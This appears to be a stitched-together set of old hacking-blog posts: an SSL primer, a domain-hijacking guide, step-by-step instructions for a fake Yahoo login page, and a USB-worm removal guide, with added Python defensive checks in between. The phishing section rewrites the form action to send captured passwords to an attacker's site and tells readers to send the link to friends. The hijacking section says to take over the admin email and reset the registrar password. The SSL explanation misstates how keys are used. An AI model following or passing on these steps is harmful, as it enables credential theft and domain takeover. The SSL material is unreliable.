    Secure Sockets Layer (SSL): Complete Tutorial Of SSL

    Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between a web client and web server. Most of us are familiar with sites such as Gmail and Yahoo using https protocol in their login pages. When we see this, we may wonder about the difference between http and https. Simply put, HTTP protocol is used for standard communication between a web server and client, while HTTPS is used for a SECURE communication.

    What exactly is Secure Communication?

    Suppose there exists two communication parties, A (client) and B (server).
    The Workings of HTTP
    When A sends a message to B, the message is sent as plain text, unencrypted. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as plain text. This poses a serious security problem: if an intruder (hacker) can gain unauthorized access to the ongoing communication between A and B, he can see the PASSWORDS, as they remain unencrypted. This scenario is illustrated using the following figure.
     
    The Workings of HTTPS
    When A sends a PASSWORD (say “mypass”) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B’s side. So even if the hacker gains unauthorized access to the ongoing communication between A and B, he gets only the encrypted password (“xz54p6kd”) and not the original password. This is shown below.
     

    How is HTTPS implemented?

    HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a website and allows visitors to trust the site with their personal information. It has the following uses:
    • An SSL Certificate enables encryption of sensitive information during online transactions.
    • Each SSL Certificate contains unique, authenticated information about the certificate owner.
    • A Certificate Authority verifies the identity of the certificate owner when it is issued.
    How Encryption Works
    Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a public key to the browser to perform the encryption. The public key is made available to everyone, but the private key (used for decryption) is kept secret. During a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the private key.
    How to identify a secure connection
    In Internet Explorer, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the address bar. You can click the lock to view the identity of the website.
    In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
    So the bottom line is, whenever you perform an online transaction such as credit card payment, bank login, or email login always ensure that you have a secure communication. A secure communication is a must in these situations to avoid phishing.
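The name and expiry checks described above, written against the certificate layout that Python's `ssl` module returns. This is an added example, not code from the original post; the sample certificate and function names are constructed, and it leaves out the CA chain validation a browser also performs.

```python
import ssl
import time

def name_matches(pattern, hostname):
    # A '*' is honoured only as the entire left-most label, as browsers do.
    p = pattern.lower().split(".")
    h = hostname.lower().rstrip(".").split(".")
    if len(p) != len(h):
        return False
    return p[1:] == h[1:] and p[0] in ("*", h[0])

def certificate_problems(cert, hostname, now=None):
    """Return the reasons a client would reject `cert` for `hostname` (empty list = OK)."""
    now = time.time() if now is None else now
    problems = []
    if now < ssl.cert_time_to_seconds(cert["notBefore"]):
        problems.append("not yet valid")
    if now > ssl.cert_time_to_seconds(cert["notAfter"]):
        problems.append("expired")
    dns_names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not any(name_matches(name, hostname) for name in dns_names):
        problems.append("name mismatch")
    return problems

# Constructed sample in the dict layout returned by ssl.SSLSocket.getpeercert().
SAMPLE_CERT = {
    "subject": ((("commonName", "example.com"),),),
    "notBefore": "Jan  1 00:00:00 2025 GMT",
    "notAfter": "Jan  1 00:00:00 2026 GMT",
    "subjectAltName": (("DNS", "example.com"), ("DNS", "*.example.com")),
}
DURING = ssl.cert_time_to_seconds("Mar  1 00:00:00 2025 GMT")
AFTER = ssl.cert_time_to_seconds("Feb  1 00:00:00 2026 GMT")

if __name__ == "__main__":
    cases = [("mail.example.com", DURING), ("example.org", DURING), ("example.com", AFTER)]
    for host, when in cases:
        print(host, certificate_problems(SAMPLE_CERT, host, when) or "OK")
```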
    This post will discuss how domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking.
    Domain hijacking is a process by which Internet Domain Names are stolen from their legitimate owners. Domain hijacking is also known as domain theft. In order to learn how to hijack domain names, we must first understand how domain names operate and how they become associated with a particular web server (website).
    The integration of domain name is as follows:
    Any website consists of two parts. For our example, we will use the website gohacking.com. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of a domain name with the web hosting server is done as follows.
    1. After registering a new domain name, we get a control panel that gives us full control of the domain.
    2. From this control panel, we point our domain name to the web server where the website’s files are actually hosted.
    For a clear understanding, let me take up a small example.
    John registers a new domain “abc.com” from X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
    What happens when a domain is hijacked?
    Let’s see what happens when a domain name is hijacked. To hijack a domain name you need to get access to the control panel and point the domain name to a different web server. To hijack a domain you do not need to gain access to the target web server.
    For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point at a different web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
    In this case, John’s domain name (abc.com) is said to be hijacked.
    How to hijack a domain name?
    To hijack a domain name, you need to gain access to the control panel of the target domain. For this you need the following:
    1. The domain registrar name for the target domain.
    2. The administrative email address associated with the target domain.
    You can get this information by accessing the WHOIS data of the target domain. Go to whois.domaintools.com, enter the target domain name, and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll find the “Administrative contact email address”.
    To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company.” Here XYZ Company is the domain registrar. In case if you don’t find this, scroll up and you’ll see ICANN Registrar under the “Registry Data.” In this case, the ICANN registrar is the actual domain registrar.
    The administrative email address associated with the domain is the backdoor to hack the domain name. It is the key to unlock the domain control panel. You need to hack this email account and take full control of it. Email hacking has been discussed in my previous post ” HOW TO HACK EMAIL ACCOUNTS.”
    Once you take full control of this email account, visit the domain registrar’s website and click forgot password on the login page. You will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once you do this, all the details to reset the password will be sent to the administrative email address. Since you already have access to this email account, you can easily reset the password of the domain control panel. After resetting the password, login to the control panel with your new password and from there you can hijack the domain within minutes.
    How to protect the domain name from being hijacked?
    The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you lose your domain. So refer to my previous post on how to “PROTECT YOUR EMAIL ACCOUNT FROM BEING HACKED.” Another way to protect your domain is to get private domain registration. When you register a domain name using the private registration option, all your personal details, such as your name, address, phone, and administrative email address, are hidden from the public. When a hacker performs a WHOIS lookup for your domain name, he will not be able to find your name, phone number, or administrative email address. The private registration provides extra security. Private domain registration costs extra, but the advantages are worth it. Every domain registrar provides a private registration option.
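Because a hijack changes where the name points and never touches web server Y, the owner has to watch the DNS records themselves. The sketch below is an added example, not from the original post: it compares observed records for "abc.com" with a recorded baseline, and the addresses, nameserver names and function names are constructed.

```python
import socket

def resolve_a(domain):
    """Live IPv4 lookup (needs network; the constructed snapshots below do not use it)."""
    infos = socket.getaddrinfo(domain, 80, family=socket.AF_INET, type=socket.SOCK_STREAM)
    return {info[4][0] for info in infos}

def drift(baseline, observed):
    """Compare observed records with the owner's baseline and return alert strings."""
    alerts = []
    for rtype in sorted(set(baseline) | set(observed)):
        expected = set(baseline.get(rtype, ()))
        seen = set(observed.get(rtype, ()))
        for value in sorted(seen - expected):
            alerts.append(f"{rtype}: now points to {value}")
        for value in sorted(expected - seen):
            alerts.append(f"{rtype}: no longer points to {value}")
    return alerts

# Constructed data: John's server Y is 192.0.2.10, the foreign server Z is 203.0.113.66.
NAMESERVERS = {"ns1.registrar-x.example", "ns2.registrar-x.example"}
BASELINE = {"A": {"192.0.2.10"}, "NS": NAMESERVERS}
SNAPSHOT_NORMAL = {"A": {"192.0.2.10"}, "NS": NAMESERVERS}
SNAPSHOT_REPOINTED = {"A": {"203.0.113.66"}, "NS": NAMESERVERS}

if __name__ == "__main__":
    for label, snap in [("normal", SNAPSHOT_NORMAL), ("repointed", SNAPSHOT_REPOINTED)]:
        print(label, drift(BASELINE, snap) or "no change")
```

Run on a schedule from a host outside the hosting account, `resolve_a("abc.com")` would supply the observed "A" set.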
    In this post, I’ll show you how to create a fake login page. A fake login page exactly resembles the original login page of sites like Yahoo and Gmail. Fake login pages are created for the purpose of stealing passwords.
    Here in this post I will provide the procedure for creating a fake login page for Yahoo.com. The same procedure may be followed to create the fake login page of Gmail and other sites.
    Due to a large number of requests from my visitors, I have elaborated some of the steps in this post. I have made best effort to explain every point in detail.
    Here is a step-by-step procedure to create a fake login page.
    STEP 1.
    Go to the Yahoo login page by typing the following URL.
    mail.yahoo.com
    STEP 2.
    Once the Yahoo login page is loaded, save the page as Complete HTML file. (Not as.mht file)
    To save the page go to File->Save As
    Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.
    STEP 3.
    Once you save the login page completely, you will see a HTML file and a folder – the name is something like Yahoo! Mail The best web-based email!
    STEP 4.
    Make sure that the folder contains the necessary images and other support files. Now rename the Folder to “files.“ You may also rename the .HTML file to yahoo.HTML
    STEP 5.
    Now open the .HTML file using a WordPad. Change the links of all the files present in the folder to /files.
    For example you may find something like this in the opened HTML file
    src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif
    Rename the above link into
    src=”files/ma_mail_1.gif
    Repeat the same procedure for every file contained in the folder by name “files“.
    Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.
    STEP 6.
    Now search for the following term
    action=
    you will see something like this
    action=https://login.yahoo.com/config/login?
    Edit this to
    action=http://yoursite.com/login.php
    Tip: Open a free account in 110mb.com to create your own site for uploading the fake login page. yoursite.com has to be substituted with the name of your site. For example if your site name is yahooupdate.110mb.com then replace yoursite.com withyahooupdate.110mb.com.
    Save the changes to the file.
    NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
    STEP 7.
    Now you have to upload your yahoo.HTML, files folder, and login.php to
    yoursite.com root folder
    NOTE: Make sure that your host supports PHP
    Tip: 110mb.com supports PHP
    STEP 8.
    Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
    Tip: login.php can save the password in any format (not necessarily .TXT format). You can search for a php script in Google that can save the password in any format. You may also search for a php script that can email the username & password.
    NOTE: The concept here is to save the password. The format is not important.
    STEP 9.
    Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends. When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
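The tell-tale left by Step 6 is a password form whose action posts to a host other than the real login endpoint, here over plain HTTP. The detector below is an added example, not from the original post: it flags such forms in a saved page, and the two HTML snippets and the class and function names are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class LoginFormAudit(HTMLParser):
    """Collect the action URL of every <form> that contains a password field."""
    def __init__(self):
        super().__init__()
        self._in_form = False
        self._has_password = False
        self._action = ""
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._in_form, self._has_password = True, False
            self._action = a.get("action") or ""
        elif tag == "input" and self._in_form and (a.get("type") or "").lower() == "password":
            self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._in_form:
            if self._has_password:
                self.password_form_actions.append(self._action)
            self._in_form = False

def audit_login_page(html, trusted_hosts):
    """Return findings for password forms that post off-site or without HTTPS."""
    parser = LoginFormAudit()
    parser.feed(html)
    parser.close()
    findings = []
    for action in parser.password_form_actions:
        url = urlparse(action)
        host = (url.hostname or "").lower()
        if url.scheme and url.scheme != "https":
            findings.append(f"password posted without HTTPS: {action}")
        if host and host not in trusted_hosts:
            findings.append(f"password posted to untrusted host {host}")
    return findings

# Constructed pages: the genuine form and a copy with the action rewritten as in Step 6.
FIELDS = '<input type="text" name="login"><input type="password" name="passwd"></form>'
GENUINE = '<form method="post" action="https://login.yahoo.com/config/login?">' + FIELDS
COPY = '<form method="post" action="http://yoursite.com/login.php">' + FIELDS
TRUSTED = {"login.yahoo.com"}
```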
     
    Wondering how to remove new folder exe or regsvr exe or autorun inf virus?

    This virus is known popularly as regsvr.exe virus, or as a new folder.exe virus. Most people identify this one by seeing the autorun.inf file on their pen drives.

    But recently it was micro identified as WORM_DELF.FKZ. It is spreading mostly using pen drives as the medium.

    Manual Process of removal

    I prefer removing it manually because it allows me to learn new things in the process.

    1. Cut The Supply Line
    Search for the autorun.inf file. It is a read only file, so you will have to change it to normal by right-clicking the file, selecting the properties, and un-checking the read only option.
    Open the file in notepad, delete everything, and save the file.
    Now change the file status back to read only mode so that the virus can not get access again.


    2. Click start->run and type “msconfig” and then click ok
    Go to the startup tab, look for “regsvr” and uncheck that option. Click OK.
    Click on “Exit without Restart” because there are still a few things we need to do before we can restart the PC.
    Now go to control panel -> scheduled tasks, and delete the At1 task listed there.

    If you are Windows XP Home Edition user, you might not have gpedit.msc. In that case, download and install it from Windows XP Home Edition: gpedit.msc and then follow these steps.
    Go to users configuration->Administrative templates->system
    Find “prevent access to registry editing tools” and change the option to disable.

    Once you do this, you have registry access back.
    3. Launch The Attack At The Heart Of The Castle
    Click on start->run and type regedit and click ok
    Go to edit->find and start the search for regsvr.exe,


    4. Delete all occurrences of regsvr.exe; remember to make a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences ONLY.

    At one or two places, you will find it after explorer.exe. In these cases only delete the regsvr.exe part and not the whole part. E.g. for Shell = Explorer.exe regsvr.exe, just delete the regsvr.exe and leave the explorer.exe.

    5. Seek And Destroy the enemy soldiers; no one should be left behind
     Click on start->search->for files and folders.
     There, click all files and folders
     Type “*.exe” as filename to search for
     Click on ‘when was it modified ‘ option and select the specify date option
     Type from date as 1/31/2008 and also type to date as 1/31/2008


     Now hit search and wait for all the exe’s to show up.
     Once the search is over, select all the exe files and shift+delete them. Take care not to delete any legitimate exe file that you installed on 31st January.
     Selecting many files together might make your computer unresponsive, so delete them in small bunches.
     Also find and delete regsvr.exe and svchost .exe (notice an extra space between the svchost and .exe).

    6. Time For Celebrations

    Now do a cold reboot (i.e., press the reboot button) and you are finished!
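The three things the manual steps look for can be checked mechanically: what an autorun.inf launches, file names that imitate system tools, and extra programs in the Shell value. This is an added example, not from the original post; the sample autorun.inf content and the function names are constructed, and the Shell parser assumes paths without spaces.

```python
import re

def autorun_targets(inf_text):
    # Programs an autorun.inf would start: open=, shellexecute= and shell\...\command= keys.
    targets, in_section = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line and not line.startswith(";"):
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() in ("open", "shellexecute") or key.lower().endswith("\\command"):
                targets.append(value)
    return targets

def name_verdict(path):
    """Classify an .exe file name; returns None for names this guide does not single out."""
    base = re.split(r"[\\/]", path)[-1].lower()
    stem, dot, ext = base.rpartition(".")
    if not dot or ext != "exe":
        return None
    if stem != stem.rstrip():
        return "space-before-extension"      # e.g. "svchost .exe"
    if stem in ("regsvr", "new folder"):     # regsvr32.exe is legitimate and not matched
        return "known-worm-name"
    return None

def extra_shell_entries(shell_value):
    """Return every program in a Winlogon Shell value other than explorer.exe."""
    entries = [e.strip('"') for e in re.split(r"[,\s]+", shell_value.strip()) if e]
    return [e for e in entries if re.split(r"[\\/]", e)[-1].lower() != "explorer.exe"]

# Constructed sample of an infected pen drive's autorun.inf.
SAMPLE_INF = "[autorun]\nopen=regsvr.exe\nshell\\open\\command=regsvr.exe\nicon=folder.ico\n"

if __name__ == "__main__":
    print(autorun_targets(SAMPLE_INF))
    print(extra_shell_entries("Explorer.exe regsvr.exe"))
    print(name_verdict("C:\\WINDOWS\\system32\\svchost .exe"))
```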
